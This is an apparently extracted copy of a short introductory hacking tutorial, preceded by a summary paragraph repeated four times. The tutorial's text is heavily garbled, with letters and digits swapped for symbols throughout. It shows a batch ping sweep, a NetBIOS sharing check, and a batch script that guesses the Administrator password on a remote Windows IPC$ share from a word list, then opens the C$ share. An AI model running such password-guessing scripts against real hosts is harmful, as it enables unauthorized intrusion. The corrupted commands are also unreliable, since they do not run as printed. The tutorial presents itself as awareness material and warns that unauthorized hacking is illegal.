The document introduces hacking techniques such as scanning, cracking, and hacking. It discusses how hackers scan networks to find hosts, crack passwords to access remote systems, and then perform activities after gaining access such as viewing files or installing malware. The document provides examples of commands used for these techniques and warns that unauthorized hacking is illegal.
The document introduces hacking techniques such as scanning, cracking, and hacking. It discusses how hackers scan networks to find hosts, crack passwords to access remote systems, and then perform activities after gaining access such as viewing files or installing malware. The document provides examples of commands used for these techniques and warns that unauthorized hacking is illegal.
The document introduces hacking techniques such as scanning, cracking, and hacking. It discusses how hackers scan networks to find hosts, crack passwords to access remote systems, and then perform activities after gaining access such as viewing files or installing malware. The document provides examples of commands used for these techniques and warns that unauthorized hacking is illegal.
The document introduces hacking techniques such as scanning, cracking, and hacking. It discusses how hackers scan networks to find hosts, crack passwords to access remote systems, and then perform activities after gaining access such as viewing files or installing malware. The document provides examples of commands used for these techniques and warns that unauthorized hacking is illegal.
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Hacker Introduction
Ivica Gjorgjievski - IGProgram
[email protected] This tutoria is free for use and distri!ution as it is" cannot !e changed or used for commercia purposes. #ontent Introduction.........................................................................................................................................$ $ %canning............................................................................................................................................$ & #racking............................................................................................................................................' ' Hacking..............................................................................................................................................( Introduction This tutoria is introduction to Hacking. The tutoria contains !asic techni)ues of hacking" can !e usefu for computer users and information securit* professionas to understand how it works and to !e aware of it. Hacker is individua who !reaks into information s*stems. +sua* are two categories of hackers" ethica ,white- hackers who are authori.ed to test information s*stems" and maicious ,!ack- hackers who !reak information s*stem for maicious purposes. Hacking is activit* of !reaking into information s*stems with scanning enumeration cracking and simiar techni)ues. /ttention0 +nauthori.ed hacking is against aws and it is prosecuted !* the authorities. /uthori.ed hacking has to !e e1picit* re)uested and confirmed with documents. /uthor is not responsi!e for inappropriate or maicious use of this tutoria. $ %canning %canning is the activit* of searching for computers services or ports on the network. The first steps of hackers are activities of scanning" the* scan the network in research of computers" when the hosts are identified ne1t steps are scanning for ports and services. Ping is the command ine utiit* for network testing" it send re)uest to host on the network and if the host is avaia!e repa* is received. ping $2&.$34.$.$& 5esut: Pinging $2&.$34.$.$& with '& !*tes of data: $ 5ep* from $2&.$34.$.$&: !*tes6'& time7$ms TT86$&4 5ep* from $2&.$34.$.$&: !*tes6'& time7$ms TT86$&4 5ep* from $2&.$34.$.$&: !*tes6'& time7$ms TT86$&4 5ep* from $2&.$34.$.$&: !*tes6'& time7$ms TT86$&4 Ping statistics for $2&.$34.$.$&: Packets: %ent 6 (" 5eceived 6 (" 8ost 6 9 ,9: oss-" /ppro1imate round trip times in mii-seconds: ;inimum 6 9ms" ;a1imum 6 9ms" /verage 6 9ms <atch script can !e used to scan ist of hosts. The foowing e1ampe scan ist of hosts in fie Hosts.t1t and if hosts are discovered are written on consoe and in fie %can=utput.t1t >ie Hosts.t1t $2&.$34.$.$9 $2&.$34.$.$$ $2&.$34.$.$& $2&.$34.$.$' >ie %can.!at @for /> ?tokens6$? ::a in ,[email protected] A do @ping -n $ - $ -w &99 ::a B nu A CC if not erroreve $ @echo ::a A CC @echo ::a BB .@%can=utput.t1t #ommand D1ampe: scan.!at 5esut: $2&.$34.$.$& Eindows operating s*stem has >ie and Printer %haring service" this service is accessed !* Fet<ios and T#P protocos" and ports $'2 or ((G. F!tstat is command ine too for diagnostic of Fet<ios service. If the resut of this too contains 7&9B then tested host has avaia!e >ie and Printer %haring service. n!tstat -/ $2&.$34.$.$& 5esut: Fet<I=% 5emote ;achine Fame Ta!e Fame T*pe %tatus --------------------------------------------- EIFH=E%IP 799B +FIJ+D 5egistered E=5KG5=+P 799B G5=+P 5egistered EIFH=E%IP 7&9B +FIJ+D 5egistered E=5KG5=+P 7$DB G5=+P 5egistered & E=5KG5=+P 7$HB +FIJ+D 5egistered ..LL;%<5=E%DLL.79$B G5=+P 5egistered & #racking Password cracking is the process of repeated* guessing for the password. Eindows operating s*stem has defaut shares as IP#M" #M and /dminM that are avaia!e with >ie and Printer %haring service over Fet<ios. /ccess to operating s*stem resources are checked !* the operating s*stem" correct credentias as user and password are needed for successfu access. Fet use command is used to manage shared resources" usua* to connect to network resources. The foowing command tr* to access the IP#M share on remote host. net use @@$2&.$34.$.$&@ipcM /u:?/dministrator? ?password? 5esut: %*stem error $'&3 has occurred. 8ogon faiure: unknown user name or !ad password. -- #orrect user and password are needed to successfu* access the host resources. >oowing e1ampe use ist of passwords in fie Passwords.t1t for password cracking" if correct password is found the command is written in consoe and in fie #rack=utput.t1t >ie: Passwords.t1t password$ password& password' password( passwordG password3 >ie: #rack.!at @rem +sage e1ampe: crack.!at $2&.$34.$.$&
@for /> ?tokens6$? ::a in ,[email protected] A do @net use @@:$@ipcM /u:?/dministrator? ?::a? &[email protected] A CC @echo net use @@:$@ipcM /u:?/dministrator? ?::a? A CC @echo net use @@:$@ipcM /u:?/dministrator? ?::a? BB .@#rack=utput.t1t #ommand D1ampe: crack.!at $2&.$34.$.$& 5esut: net use @@$2&.$34.$.$&@ipcM /u:?/dministrator? ?passwordG? ' The password is cracked" access to host $2&.$34.$.$& is successfu with user: /dministrator and password: passwordG ' Hacking Hacking of compromised host can consist of different activities" as access to important information" e1tracting passwords or instaing sp*ware programs. Fet view command shows the shared resources on remote host: net view @@$2&.$34.$.$& The same resuts can !e o!tained in Eindows D1porer" just insert @@$2&.$34.$.$& in address !ar. To access shares fies and foders" insert @@$2&.$34.$.$&@#M in Eindows D1porer address !ar. Fote: Hacking techni)ues in this tutoria are ver* simpe and primitive just for demonstration. There are ot of much powerfu techni)ues and toos even for free on internet" and who know what ese e1ists. %o the recommendation is shieds awa*s up 0 Ivica Gjorgjievski - IGProgram [email protected] This tutoria is free for use and distri!ution as it is" cannot !e changed or used for commercia purposes. (
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